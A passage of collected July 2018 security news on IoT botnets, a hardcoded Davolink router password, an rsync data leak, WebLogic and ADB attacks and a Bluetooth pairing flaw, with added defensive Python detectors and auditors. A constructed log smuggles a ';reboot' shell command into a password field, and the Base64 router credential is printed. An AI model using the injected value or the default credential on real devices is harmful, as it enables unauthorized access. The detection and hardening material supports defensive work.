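    shell at all; this check rejects the whole injection class regardless."""
    return 0 < len(value) <= max_len and not has_injection_marker(value)


# Common-log-format request line (constructed sample format).
REQUEST = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"'
)


def flag_injection_attempts(log_text: str):
    """Return (ip, timestamp, parameter, decoded value) for every request whose
    credential parameter carries a shell metacharacter."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        for name, values in query.items():
            if name.lower() not in CREDENTIAL_PARAMS:
                continue
            for value in values:
                if has_injection_marker(value):
                    hits.append((m["ip"], m["ts"], name, value))
    return hits


# Constructed access-log sample: one normal login, one attempt that smuggles
# a shell command (the article's own "reboot" illustration) into the password.
CONSTRUCTED_LOG = """\
203.0.113.7 - - [25/Jul/2018:10:01:02 +0000] "GET /cgi-bin/login.cgi?user=admin&password=Zz9%21 HTTP/1.1" 200 512
198.51.100.9 - - [25/Jul/2018:10:01:05 +0000] "GET /cgi-bin/login.cgi?user=admin&password=x%3Breboot HTTP/1.1" 200 77
203.0.113.7 - - [25/Jul/2018:10:06:11 +0000] "GET /cgi-bin/login.cgi?user=admin&password=Zz9%21 HTTP/1.1" 401 0
"""

if __name__ == "__main__":
    for hit in flag_injection_attempts(CONSTRUCTED_LOG):
        print("suspicious credential field:", hit)
```

Because the detection decodes the query string before matching, percent-encoded metacharacters are caught as well as literal ones; a check that ran on the raw request line would miss the encoded form.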

Anubhav has already identified over 1,200 AVTech devices that are potentially at risk.

Anubhav contacted EliteLands, who confirmed that he plans to use the Death botnet in massive attacks.

“The Death botnet has not attacked anything major yet but I know it will,” EliteLands said. “The Death botnet purpose was originally just to DDoS but I have a greater plan on it soon. I don’t really use it for attacks only to get customers aware of the power it has.”

Korean Davolink routers are easily exploitable due to poor cyber hygiene
25.7.2018 securityaffairs

Davolink dvw 3200 routers have their login portal up on port 88; access is password protected, but the password is hardcoded in the HTML of the login page.
The story started in 2018 when Anubhav noticed a very basic flaw in the routers of the Korean vendor Davolink.

These Davolink dvw 3200 routers have their login portal up on port 88, and access is password protected.

Analyzing the code of the page, the expert noticed a function named “clickApply” that included the password in standard Base64 encoding.

function clickApply(sel) {
    // Credential shipped inside the login page itself, Base64-encoded
    var user_passwd="YWRtaW4=";
    var super_passwd="(null)";
    // encode() is defined elsewhere in the page and not shown in the article
    document.forms[0].http_passwd.value = encode(document.forms[0].tmp_http_passwd.value);
}

Scanning the Internet for similar devices with the Zoomeye search engine, he discovered that more than 50 routers in Korea are exposed online and accessible using the hardcoded password.
The expert reported the issue to the vendor, which quickly acknowledged it and responded that the product has been discontinued. The vendor added that a working patch is already available.
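A credential sitting in client-side markup is something a firmware build pipeline can catch before shipping. The following is an added example, not code from the article, from Davolink or from Anubhav: a scanner that walks HTML/JavaScript source for variable assignments whose name suggests a credential and reports whether the literal value is Base64 that decodes to text. The sample page reproduces the snippet quoted in the article inside a constructed HTML wrapper; the variable-name heuristic is an assumption of the example.

```python
import base64
import re

# Added example (not vendor code). Assignment of a string literal to a
# variable whose name hints at a credential; the name list is a heuristic.
CRED_VAR = re.compile(
    r'\b(?:var|let|const)\s+(\w*(?:passwd|password|pwd|secret)\w*)\s*=\s*["\']([^"\']*)["\']',
    re.IGNORECASE,
)

B64_SHAPE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def looks_base64(value: str) -> bool:
    """Cheap shape test before attempting to decode."""
    return bool(value) and len(value) % 4 == 0 and B64_SHAPE.fullmatch(value) is not None


def find_hardcoded_credentials(source: str):
    """Return one finding per credential-looking assignment, with the literal
    value and, where it is Base64 encoding printable text, the decoded text."""
    findings = []
    for match in CRED_VAR.finditer(source):
        name, value = match.group(1), match.group(2)
        decoded = None
        if looks_base64(value):
            try:
                decoded = base64.b64decode(value, validate=True).decode("utf-8")
                if not decoded.isprintable():
                    decoded = None
            except (ValueError, UnicodeDecodeError):
                decoded = None
        findings.append({"name": name, "value": value, "decoded": decoded})
    return findings


# Constructed page wrapping the function shown in the article.
CONSTRUCTED_PAGE = """\
<html><body>
<script>
function clickApply(sel) {
    var user_passwd="YWRtaW4=";
    var super_passwd="(null)";
    document.forms[0].http_passwd.value = encode(document.forms[0].tmp_http_passwd.value);
}
</script>
</body></html>
"""

if __name__ == "__main__":
    for finding in find_hardcoded_credentials(CONSTRUCTED_PAGE):
        print(finding)
```

Run against firmware web assets as a release gate, the scanner turns the "basics" Anubhav mentions into a mechanical check; the decoded column is there so a reviewer sees at a glance that encoding is not protection.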

The expert published the exploit code on exploit-db.

“Many IoT vendors are not doing the basics right; keeping the password in the HTML source is a very basic security issue,” concluded Anubhav, “and it is a relevant issue as users in Korea are using it.”

Gigamon Acquires Network Visibility Startup ICEBRG

24.7.2018 securityweek IT

Network traffic analysis firm Gigamon on Tuesday announced plans to acquire network security startup ICEBRG.

Founded in 2014, Seattle, Washington-based ICEBRG provides a Security-as-a-Service (SaaS) solution designed to help organizations detect threats and gain network visibility for security operations.

Gigamon's flagship GigaSECURE platform provides visibility into network traffic, users, applications and suspicious activity.

The ICEBRG platform uses sensors deployed at customer locations that stream network traffic metadata to a cloud-based system that helps Security Operations Center (SOC) teams quickly identify threats and act to remediate them.

Gigamon says it will combine the two platforms to help enterprises leverage various security tools.

“The combination of the high-quality network data from the GigaSECURE Security Delivery Platform and the ICEBRG cloud-based platform will power the next generation of security capabilities. Together, our expertise in networking and security will help SOC teams focus on defending against the most severe threats in their environments,” William Peteroy, co-founder and CEO of ICEBRG, said.

The terms of the deal were not disclosed.

Data Leak at Robotics Firm Exposes Global Manufacturers
24.7.2018 securityweek Incident

A publicly accessible server belonging to robotics vendor Level One Robotics and Controls, Inc. contained sensitive documents connected to more than one hundred manufacturing companies.

Established in 2000, the engineering service provider offers automation process and assembly for OEMs, Tier 1 automotive suppliers, and end users, delivering services such as project management, design, integration, debugging, and training.

The exposed server was discovered by the UpGuard Cyber Risk team earlier this month. It contained 157 gigabytes of data, including documents, schematics, and other information belonging to the provider’s customers and employees.

The exposed data included “over 10 years of assembly line schematics, factory floor plans and layouts, robotic configurations and documentation, ID badge request forms, VPN access request forms, and ironically, non-disclosure agreements,” the security firm reveals.

Specifications and use of the machines, as well as animations of the robots at work, customer contact details, and ID badge request forms were also found on the server.

Level One customers impacted by the data exposure include divisions of VW, Chrysler, Ford, Toyota, GM, Tesla and ThyssenKrupp.

The server also contained data belonging to organization’s employees, such as scans of driver’s licenses and passports and other identification. Level One business data was also exposed, including invoices, prices, contracts, typical business documents, and bank account details (including account and routing numbers, and SWIFT codes).

“The sheer amount of sensitive data and the number of affected businesses illustrate how third and fourth-party supply chain cyber risk can affect even the largest companies,” the security firm notes.

UpGuard says the data was exposed via rsync, a file transfer protocol commonly used for large data transfers. The researchers found that access to the server was not restricted by IP address or user, so the data was downloadable by any rsync client that connected to the rsync port.
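The exposure described here is a configuration problem: an rsync daemon module with no client restriction and no authentication serves its path to anyone who can reach the port. The following is an added example, not from UpGuard or Level One, that audits an rsyncd.conf for exactly those conditions, showing a weak module beside a hardened one. Both configurations are constructed; the module name, path and user are placeholders.

```python
# Added example (not UpGuard's tooling): audit rsyncd.conf modules for
# anonymous, unrestricted exposure. Setting names are rsync's own; the
# defaults applied ("list = yes", "read only = yes") match rsyncd.conf(5).

# Constructed weak configuration: module reachable from any IP, no auth,
# and listed to anyone who asks the daemon for its module list.
WEAK_CONF = """\
uid = nobody
[projects]
    path = /srv/projects
    read only = yes
"""

# Constructed hardened configuration for the same module.
HARDENED_CONF = """\
uid = nobody
[projects]
    path = /srv/projects
    read only = yes
    list = no
    hosts allow = 10.0.0.0/8
    auth users = builder
    secrets file = /etc/rsyncd.secrets
"""

TRUE_VALUES = {"yes", "true", "1"}
FALSE_VALUES = {"no", "false", "0"}


def parse_rsyncd_conf(text: str):
    """Minimal rsyncd.conf parser: global 'key = value' lines followed by
    [module] sections. Returns (globals, {module: settings})."""
    globals_, modules, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules[current] = {}
            continue
        if "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        target = globals_ if current is None else modules[current]
        target[key.lower()] = value
    return globals_, modules


def audit_rsyncd(text: str):
    """Return {module: [issue, ...]}; an empty list means no finding."""
    globals_, modules = parse_rsyncd_conf(text)
    report = {}
    for name, settings in modules.items():
        effective = {**globals_, **settings}      # module overrides globals
        issues = []
        if "auth users" not in effective:
            issues.append("no 'auth users': module is served anonymously")
        elif "secrets file" not in effective:
            issues.append("'auth users' set without 'secrets file': auth cannot work")
        if "hosts allow" not in effective:
            issues.append("no 'hosts allow': reachable from any client address")
        if effective.get("list", "yes").lower() in TRUE_VALUES:
            issues.append("module is listed to unauthenticated clients")
        if effective.get("read only", "yes").lower() in FALSE_VALUES:
            issues.append("module is writable")
        report[name] = issues
    return report


if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_rsyncd(conf))
```

Restricting `hosts allow` to the addresses that legitimately pull from the module is the single setting that would have kept the server off the open Internet; the authentication settings are the second layer for the case where the network boundary is wrong.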

“This is the same type of administrative error we continue to see over and over again both on-premise as well as in the cloud. Until organizations wholly operationalize security into their development lifecycle, we will likely continue to see similar data exposure from non-malicious insiders,” Matt Chiodi, VP of Cloud Security at RedLock, told SecurityWeek in an emailed commentary.

Discovered on July 1, 2018, the exposed rsync server was determined to belong to Level One several days later. The company was successfully informed of the issue on July 9 and closed the exposure by the next day.

“The fact that this kind of breach happened and data from so many big players was involved goes to show that anyone can be a victim if third parties are not continuously vetted. It is no longer enough for companies to maintain trust through a one-time or annual audit. Big players should demand a transparent and ongoing demonstration of security controls in action,” James Lerud, head of the Behavioral Research Team at Verodin, said in an emailed commentary.

Recently Patched Oracle WebLogic Flaw Exploited in the Wild
24.7.2018 securityweek

At least two threat groups have started exploiting a critical Oracle WebLogic vulnerability patched earlier this month. The attacks began shortly after several proof-of-concept (PoC) exploits were made public.

The vulnerability, tracked as CVE-2018-2893 and assigned a CVSS score of 9.8, allows an unauthenticated attacker to remotely take control of a WebLogic Server. The flaw affects the product’s WLS Core Components subcomponent and it can be exploited via the T3 transport protocol.

The security hole impacts versions,, and, and it was addressed by Oracle with its July 2018 Critical Patch Update (CPU).

Oracle has credited five different researchers for independently reporting the flaw, and one of the experts already claims to have found a way to bypass the vendor’s patch.

Shortly after Oracle announced the latest security updates on July 18, several individuals released PoC exploits on GitHub and other websites.

The Netlab group at Chinese security company Qihoo 360 reported seeing the first attacks on July 21. The campaign used luoxkexp[.]com as its main command and control (C&C) server.

According to NetLab, the domain was registered in March 2017 and hackers have been using it ever since. The group that owns the domain, tracked by NetLab as luoxk, has been using it for campaigns involving DDoS bots, RATs, cryptocurrency mining, malicious Android APKs, and worm-style exploits with the Java RMI (Remote Method Invocation) service.

In the attacks involving CVE-2018-2893, the hackers delivered the XMRig Monero miner and the Bill Gates DDoS malware.

SANS has also tracked attacks exploiting CVE-2018-2893 and the organization has seen attempts to install what appears to be a backdoor.

It’s not uncommon for malicious actors to target Oracle WebLogic vulnerabilities in their attacks, with several campaigns spotted over the past months.

While Oracle has been busy developing patches for these flaws, researchers have managed to find ways to bypass the fixes.


Cybersecurity, Compliance Slowing U.S. Government's Digital Transformation
24.7.2018 securityweek BigBrothers

Complex Compliance Requirements are Delaying U.S. Government's Digital Transformation, Study Shows

With trust in the U.S. government at an all-time low (the Pew Research Center says that only 3% of Americans trust Washington to do the right thing 'just about always'), the suggestion is that a new 'moonshot moment' is necessary for government. A new report (PDF) says that moment is possible with digital transformation.

Success, however, is dependent on three requirements: federal agencies must create a culture of innovation; must prioritize the citizen experience; and must implement an integrated approach to digital transformation.

Consulting firm ICF employed Wakefield Research to survey 500 federal employees to understand the opportunities and obstacles for federal digital transformation. The prize, says ICF, is reigniting citizen trust and satisfaction in government, regardless of the administration. Cybersecurity and compliance issues are among the greatest of the obstacles, with user satisfaction an additional problem.

Eighty-nine percent of the respondents said that security and privacy requirements significantly delay technological innovation. More than half of the respondents admitted to experiencing a cybersecurity incident after implementing a new digital initiative, while almost half of those said that the incident delayed future innovation.

The federal IT procurement process is also an inhibitor, with 91% of respondents saying it needs to be completely overhauled. More than 30% go so far as to recognize benefits in using unauthorized technologies that have not been officially sanctioned by the IT department.

ICF believes that the combination of security/compliance concerns and strict procurement policy is inhibiting the creativity of federal agencies. "Creating a culture of innovation," says the report, "requires encouraging staff within agencies to think outside the box and empowering them to follow through on new ideas by providing targeted support."

Baris Yener, an SVP at ICF, told SecurityWeek, "Compliance has become an overly-complex aspect of security in the government. This is due primarily to the fact that the public sector thinks of security as an afterthought, something that is tacked on to existing processes, rather than building solutions with a security-first mindset. Compliance will remain a hindrance," he added, "until the government and its agencies embrace a shift in thinking that prioritizes an integrated approach to creating tools and services. Once that shift takes place, and stakeholders from across departments are brought together, compliance will be simpler."

In the meantime, he does not believe that empowering creativity will necessarily lead to an unacceptable expansion of shadow IT within federal agencies.

"By embracing outside-the-box thinking, and fostering a culture that encourages creativity," he said, "those staff members will instead raise their hand to offer new solutions, rather than turn to shadow IT. Creative thinking needs to be nurtured and rewarded. If there's anything we know about the nature of cybersecurity today, it's that the threat landscape is constantly changing. Feds with a different perspective will be critical to navigating uncharted territory."

Essential to the moonshot moment of digital transformation is user engagement with the outcome. Ninety-seven percent of the survey respondents say that government agencies now have a greater responsibility than ever to provide the digital tools and services that will make a positive difference in citizens' lives. But 80% also said that government is prioritizing perfecting the technology over the citizen experience.

The extent to which regulations affect new digital technology can be seen by 44% of respondents claiming that compliance is the biggest priority when implementing a new digital technology, with 36% saying that speed of implementation is the prime priority. User adoption of that technology ranks second to last (30%), worsened only by the ability to measure its success (23%).

With such driving principles, ICF sees little chance of government maximizing the potential for engaging the trust of citizens. Federal staff accept the problem, with 92% suggesting that improving usability of the technology should be prioritized over technology development. "Instead of looking to the private sector primarily for technology solutions," suggests ICF, "federal leaders must implement user research and feedback loops that are designed to create and improve digital services."

This may seem a little surprising, since the issue of usability is understood and being tackled by new technologies in the private sector. The big development is the increasing use of artificial intelligence -- for example in reducing user friction in access control. However, Yener does not believe that such solutions can simply be transposed to the federal sector.

"For example," he told SecurityWeek, "when implementing new technologies like AI, the government needs to consider how to identify and document the standardization of those technologies, along with how it will be used within all agencies. Private sector by comparison has the freedom and flexibility to implement whatever would be beneficial to the business, with minimal standardization required or concern for other companies in their industry."

If project funding is available, the biggest obstacles to new digital developments are security concerns (41%), outdated policies (28%), skilled staff shortages (27%), complexity (22%), and lack of time (22%). Other obstacles include poor inter-office communication, difficulty in procuring services, and lack of support from senior management.

"To develop an integrated approach to digital transformation," says the report, "agencies should build a multidisciplinary team that executes technology implementation and prioritizes user adoption. Leaders need to ensure that every department -- including common omissions like HR -- is represented to better understand the needs of the entire organization as it works to apply digital transformation." Successful digital transformation, it adds, "will position the federal government to launch its next moonshot: digital transformation that reignites citizen trust and satisfaction in the government -- regardless of the administration."

AVEVA Patches Critical Flaws in HMI/SCADA Tools Following Schneider Merger
24.7.2018 securityweek

UK-based industrial software company AVEVA has patched two critical remote code execution vulnerabilities discovered by researchers in its InTouch and InduSoft development tools.

AVEVA merged with Schneider Electric earlier this year and took over the France-based industrial giant’s Avantis and Wonderware brands. The Wonderware portfolio includes the InduSoft Web Studio and InTouch Machine Edition HMI/SCADA software.

George Lashenko, a researcher with industrial cybersecurity firm CyberX, discovered that some versions of InTouch 2014 and 2017 are affected by a critical stack-based buffer overflow vulnerability. The flaw is tracked as CVE-2018-10628 and it has been assigned a CVSS score of 9.8.

“InTouch provides the capability for an HMI client to read and write tags defined in a view. A remote unauthenticated user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability with potential for code to be executed while performing a tag-write operation on a locale that does not use a dot floating point separator. The code would be executed under the privileges of the InTouch View process and could lead to a compromise of the InTouch HMI,” AVEVA wrote in its advisory.

David Atch, VP of research at CyberX, told SecurityWeek that the vulnerability can be exploited remotely from the Internet if the targeted system is exposed to the Web. The attacker can take control of the HMI by directly sending it specially crafted packets, but the attack can also involve a piece of malware designed to send the malicious packets to the HMI.

“This provides the attacker with full control of the ICS process, enabling them to manipulate process parameters and potentially cause destructive actions like allowing pressure or temperature in a mixing tank to rise above acceptable levels,” Atch explained.

AVEVA released InTouch 2017 Update 2 HF-17_2 /CR149706 and InTouch 2014 R2 SP1 HF-11_1_SP1 /CR149705 on July 13 to patch the vulnerability.

AVEVA fixes critical vulnerabilities in InduSoft and InTouch tools

Separately, researchers at Tenable discovered another critical remote code execution vulnerability. The security hole, tracked as CVE-2018-10620 with a CVSS score of 9.8, impacts both InTouch Machine Edition and InduSoft Web Studio.

“InduSoft Web Studio and InTouch Machine Edition provide the capability for an HMI client to read, write tags and monitor alarms and events. A remote user could send a carefully crafted packet to exploit a stack-based buffer overflow vulnerability during tag, alarm, or event related actions such as read and write, with potential for code to be executed. The code would be executed under the privileges of the Indusoft Web Studio or InTouch Machine Edition runtime and could lead to a compromise of the InduSoft Web Studio or InTouch Machine Edition server machine,” AVEVA said in its advisory.

The company patched the flaw on July 13 with the release of Hotfix for each of the impacted products.

“These vulnerabilities leave InduSoft Web Studio or InTouch Machine Edition server machines vulnerable to an unauthenticated remote attacker who could leverage them to execute arbitrary code, potentially leading to full system compromise. In turn, these machines could allow an attacker to move laterally within a network. Connected HMI clients and OT devices can also be exposed to attacks,” Tenable said in a blog post, which includes technical details and a PoC exploit.

The flaw is similar to one disclosed by Tenable in early May, but it’s triggered via a different command.

Security Orchestration Firm Siemplify Raises $14 Million
24.7.2018 securityweek IT

Siemplify, a New York, NY-based provider of security orchestration, automation and response (SOAR) tools, today announced that it has raised $14 million in a Series B funding round led by Jump Capital.

This latest funding brings the total amount raised by the company to $28 million.

Designed to help security operations teams work more efficiently, Siemplify’s platform assists with tasks ranging from incident triage and investigation to collaboration and remediation.

“SOAR enables the management of disparate cybersecurity tools - including SIEM, endpoint protection, threat intelligence and more - through a single platform that helps security operations teams respond to threats faster and more effectively,” the company explains.

Jump Capital was joined by the company’s existing investors G20 Ventures and 83North in the Series B round.

Siemplify is yet another cybersecurity startup founded by former Israeli Defense Forces (IDF) security experts.

Android Debugging Tools Also Useful for Compromising Devices, Mining Cryptocurrency
24.7.2018 securityaffairs Android  Cryptocurrency

It is common for developers to use debugging tools with elevated privileges while they are trying to troubleshoot their code. But crooks can abuse them too.
In an ideal world, all of the security controls are applied and all of the debugging tools are removed or disabled before the code is released to the public. In reality, devices are sometimes released in a vulnerable state without the end users’ knowledge.

Based upon recent spikes in scans of TCP port 5555, someone believes that there is an exploitable vulnerability out there.

The Android software development kit (SDK) provides a tool for developers to debug their code called the Android Debug Bridge (adb). According to the Google developer portal,

“The adb command facilitates a variety of device actions, such as installing and debugging apps, and it provides access to a Unix shell that you can use to run a variety of commands on a device.”

These are very powerful functions for debugging tools, and also useful for executing malicious code without being trapped by the usual security controls. As long as the adb tool is used in a secured environment, it presents little risk. It is recommended that the adb service be disabled before devices are released to consumers, and it is common for the adb service to be restricted to USB connectivity only.

In early June, security researcher Kevin Beaumont warned that, “Unfortunately, vendors have been shipping products with Android Debug Bridge enabled. It listens on port 5555, and enables anybody to connect over the internet to a device. It is also clear some people are insecurely rooting their devices, too.” He goes on to describe the types of Android-based devices that were found to be in a vulnerable state and accessible from the Internet: “[…] we’ve found everything from tankers in the US to DVRs in Hong Kong to mobile telephones in South Korea. As an example, a specific Android TV device was also found to ship in this condition.” It only took one month from this warning until researchers at Trend Micro identified suspicious port scans on TCP port 5555.

According to the Trend Micro blog, “We found a new exploit using port 5555 after detecting two suspicious spikes in activity on July 9-10 and July 15. […] Our data shows that the first wave of network traffic came mainly from China and the US, while the second wave primarily involved Korea.”


The Trend Micro researchers’ analysis shows a fairly typical command & control (C&C) malware infection process with many similarities to the Satori variant of the Mirai botnet. Once an open adb port is identified, the malware drops a stage 1 shell script onto the device which, when launched, downloads two additional (stage 2) shell scripts which then download the “next stage binary for several architectures and launch the corresponding one.” The binary establishes a connection to the C&C server, then scans processes running on the compromised device and attempts to kill any that are running the CoinHive script that could be mining Monero. At the same time, the binary attempts to spread to other devices as a worm.

It isn’t clear what the intent for the compromised devices is. Analysis of the code indicates that it could be used as a distributed denial of service (DDoS) platform if enough devices are compromised. Since it appears to be killing Monero mining processes, the compromised devices could be retasked to mine cryptocurrency for a different group. After Kevin Beaumont’s warning in June, IoT search engine Shodan added the ability to search for adb vulnerable systems and currently lists over 48,000 potentially vulnerable devices.
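The two spikes Trend Micro describes are the kind of signal a defender can pull from perimeter logs without any knowledge of the payload: a sudden rise in distinct sources probing TCP/5555 stands out against the daily baseline. The following is an added example, not Trend Micro's code or data, that counts distinct probing sources per day from a constructed firewall log and flags days well above the median; the log format, addresses and per-day counts are all constructed, with bursts placed on the dates the article cites.

```python
import re
import statistics
from collections import defaultdict

# Added example (not Trend Micro tooling). Constructed firewall-log line
# format: one dropped connection attempt per line, key=value fields.
LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2})T\S+\s+DROP\s+src=(?P<src>\S+)\s+dst=\S+\s+"
    r"proto=tcp\s+spt=\d+\s+dpt=(?P<dpt>\d+)$"
)


def constructed_log():
    """Constructed sample: quiet days plus bursts of TCP/5555 probes on
    July 9-10 and July 15, mirroring the spike dates the article cites."""
    probes_per_day = {"2018-07-07": 1, "2018-07-08": 2, "2018-07-09": 8,
                      "2018-07-10": 9, "2018-07-11": 1, "2018-07-12": 2,
                      "2018-07-15": 10}
    lines = []
    for day, count in probes_per_day.items():
        for i in range(count):
            lines.append(f"{day}T03:{i:02d}:00Z DROP src=198.51.100.{10 + i} "
                         f"dst=203.0.113.5 proto=tcp spt=4{i:04d} dpt=5555")
        # unrelated traffic on the same day that must not be counted
        lines.append(f"{day}T04:00:00Z DROP src=198.51.100.200 "
                     f"dst=203.0.113.5 proto=tcp spt=40000 dpt=22")
    return lines


def sources_per_day(lines, port=5555):
    """Count distinct source addresses per day that probed the given port."""
    per_day = defaultdict(set)
    for line in lines:
        m = LINE.match(line)
        if m and int(m["dpt"]) == port:
            per_day[m["ts"]].add(m["src"])
    return {day: len(srcs) for day, srcs in sorted(per_day.items())}


def detect_spikes(per_day, factor=3.0, min_sources=5):
    """Flag days whose distinct-source count is above an absolute floor and
    at least `factor` times the median over all days (the baseline)."""
    if not per_day:
        return []
    baseline = statistics.median(per_day.values())
    return [day for day, n in per_day.items()
            if n >= min_sources and n >= factor * baseline]


if __name__ == "__main__":
    counts = sources_per_day(constructed_log())
    print(counts)
    print("spike days:", detect_spikes(counts))
```

Counting distinct sources rather than raw packets keeps a single noisy scanner from triggering the rule, and the median baseline is robust to the spike days themselves; a mean would be dragged upward by exactly the days you want to catch.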

The Trend Micro researchers offer a few suggestions to reduce your risk:

On your mobile device, go to Settings, select “Developer Options” and ensure that “ADB (USB) debugging” and “Apps from Unknown Sources” are turned off
Apply recommended patches and updates from the vendor
Perform a factory reset to erase the malware if you feel you are infected
Update intrusion prevention systems (IPS) to identify and block potentially malicious code before it reaches your device
The Android operating system was developed to run on a wide variety of devices. It is a flexible and complex solution that has encouraged a wide range of vendors to implement solutions based on Android. Some of these vendors have robust quality assurance processes in place and their solutions are “safe” while others allow mistakes to slip through the process and allow the vulnerabilities to land in the hands of end users. These users often aren’t aware of what operating system their devices are running and have no idea what vulnerabilities may exist until it is too late. It appears there are at least 48,000 examples of this waiting to be exploited.

DHS – Russian APT groups are inside US critical infrastructure
24.7.2018 securityaffairs APT

The US Government is warning of continuous intrusions into national critical infrastructure and is blaming the Kremlin for the cyber attacks.
According to the US Department of Homeland Security, Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and are still targeting them.
These attacks could have dramatic consequences; an attack against a power grid could cause a massive power outage.

This isn’t science fiction: it has already happened in Ukraine, and security experts blamed Russian APT groups tracked as Dragonfly and Energetic Bear.

According to the government experts, the hackers were also able to penetrate air-gapped networks.

The Wall Street Journal quoted Homeland Security officials reporting various attacks.

“Hackers working for Russia claimed “hundreds of victims” last year in a long-running campaign that put them inside the control rooms of U.S. electric utilities where they could have caused blackouts, federal officials said.” states the WSJ.

The officials maintain that the Energetic Bear APT has already penetrated “hundreds” of systems in national power grids.

The DHS issued several alerts related to the APT attacks and shared technical details about their TTPs, including Indicators of Compromise (IOCs) to detect their presence in the IT infrastructure.

Cyber intrusions into critical infrastructure are part of a long-term information warfare strategy.

Russian APT groups carried out spear-phishing attacks against utilities’ equipment vendors and subcontractors to gather intelligence and collect the information needed to penetrate the infrastructure.

The hackers aim to exploit the access that equipment makers and suppliers have into the utilities for ordinary maintenance and telemetry. That access could allow them to deploy malware into the facilities.

Unfortunately, the attacks are still ongoing; much critical infrastructure is operated by private companies with poor cyber hygiene.

Unfortunately, in many cases the operators are completely unaware of the attackers’ presence in their networks.

“They got to the point where they could have thrown switches,” Jonathan Homer, chief of industrial control system analysis for Homeland Security, told the paper.

Bluetooth Vulnerability Allows Traffic Monitoring, Manipulation
24.7.2018 securityweek

A high severity vulnerability affecting some Bluetooth implementations can allow an attacker in physical proximity to two targeted devices to monitor and manipulate the traffic they exchange. Some of the impacted vendors have already released patches.

The flaw, discovered by researchers at the Israel Institute of Technology and tracked as CVE-2018-5383, is related to the Secure Simple Pairing and LE Secure Connections features.

According to the Bluetooth Special Interest Group (SIG), whose members maintain and improve the technology, Bluetooth specifications recommend that devices supporting the two features validate the public key received during the pairing process. However, this is not a requirement and some vendors’ Bluetooth products do not perform public key validation.

An unauthenticated attacker who is in Bluetooth range of the targeted devices during the pairing process can launch a man-in-the-middle (MitM) attack and obtain the encryption key, which allows them to intercept traffic and forge or inject device messages.

“The attacking device would need to intercept the public key exchange by blocking each transmission, sending an acknowledgement to the sending device, and then injecting the malicious packet to the receiving device within a narrow time window. If only one device had the vulnerability, the attack would not be successful,” the Bluetooth SIG explained.

Additional technical details about the vulnerability and attack method were made public on Monday by CERT/CC.

The Bluetooth SIG says it has now updated specifications to require products to validate public keys. The organization has also added testing for this vulnerability to its Bluetooth Qualification Process, which all products that use Bluetooth must complete.
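The check the updated specification now requires is small: before using the peer's public key in the pairing ECDH exchange, confirm that it is actually a point on the curve. Both Secure Simple Pairing and LE Secure Connections use the NIST P-256 curve, whose cofactor is 1, so an on-curve check with coordinates in range is the complete validation for a received point. The following is an added example, not code from the Bluetooth SIG, the researchers or any vendor: it validates a P-256 public key with plain integer arithmetic and parses the 64-byte X||Y form in which LE transmits the key (little-endian per field, assumed here from the LE convention). The curve constants are the published P-256 parameters.

```python
# Added example (not Bluetooth SIG or vendor code): public-key validation for
# the P-256 curve used by Secure Simple Pairing and LE Secure Connections.
# Curve: y^2 = x^3 - 3x + B over GF(P). Constants are the standard P-256 values.
P = 0xffffffff00000001000000000000000000000000ffffffffffffffffffffffff
A = P - 3
B = 0x5ac635d8aa3a93e7b3ebbd55769886bc651d06b0cc53b0f63bce3c3e27d2604b
GX = 0x6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296
GY = 0x4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5


def validate_public_key(x: int, y: int) -> bool:
    """Return True only if (x, y) is a valid P-256 public key.

    Checks: both coordinates are field elements, the point is not the
    identity (which has no affine representation), and it satisfies the
    curve equation. P-256 has cofactor 1, so every point on the curve is in
    the prime-order subgroup and no extra order check is needed.
    """
    if not (0 <= x < P and 0 <= y < P):
        return False
    return (y * y - (x * x * x + A * x + B)) % P == 0


def accept_peer_public_key(pdu: bytes):
    """Parse a 64-byte X||Y public key as carried in the LE Pairing Public
    Key PDU (32-byte little-endian X, then 32-byte little-endian Y; byte order
    assumed here) and return (x, y) if valid, else None. A pairing
    implementation must abort on None rather than continue the ECDH exchange.
    """
    if len(pdu) != 64:
        return None
    x = int.from_bytes(pdu[:32], "little")
    y = int.from_bytes(pdu[32:], "little")
    return (x, y) if validate_public_key(x, y) else None


if __name__ == "__main__":
    good = GX.to_bytes(32, "little") + GY.to_bytes(32, "little")
    print("generator accepted:", accept_peer_public_key(good) is not None)
    bad = bytearray(good)
    bad[32] ^= 1            # flip the low bit of Y: no longer on the curve
    print("tampered key accepted:", accept_peer_public_key(bytes(bad)) is not None)
```

An implementation that skipped this check would feed whatever coordinates arrived into its scalar multiplication; the on-curve test costs a handful of multiplications and removes that input from the attacker's control.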

“There is no evidence that the vulnerability has been exploited maliciously and the Bluetooth SIG is not aware of any devices implementing the attack having been developed, including by the researchers who identified the vulnerability,” the Bluetooth SIG said.

Apple and Intel have already rolled out patches for this vulnerability. Apple fixed CVE-2018-5383 in the past weeks with the release of macOS High Sierra 10.13.5, iOS 11.4, watchOS 4.3.1, and tvOS 11.4.

Intel published an advisory on Monday, informing users that the high severity flaw impacts its Dual Band Wireless-AC, Tri-Band Wireless-AC and Wireless-AC product families. The company has released both software and firmware updates to patch the security hole, and provided instructions on how to address the issue on Windows, Linux and Chrome OS systems.

Broadcom says some of its products using Bluetooth 2.1 or newer may be impacted, but it claims to have already made fixes available to its OEM customers. It’s now up to these companies to ensure that the patches reach end users.

CERT/CC’s advisory also lists Qualcomm as being affected, but the company has yet to provide any information.

EU Antitrust Officials Probe Thales, Gemalto Merger
24.7.2018 securityweek  BigBrothers

The European Union said Monday it has launched an anti-trust investigation into the planned purchase by French aerospace and defence group Thales of SIM manufacturer Gemalto.

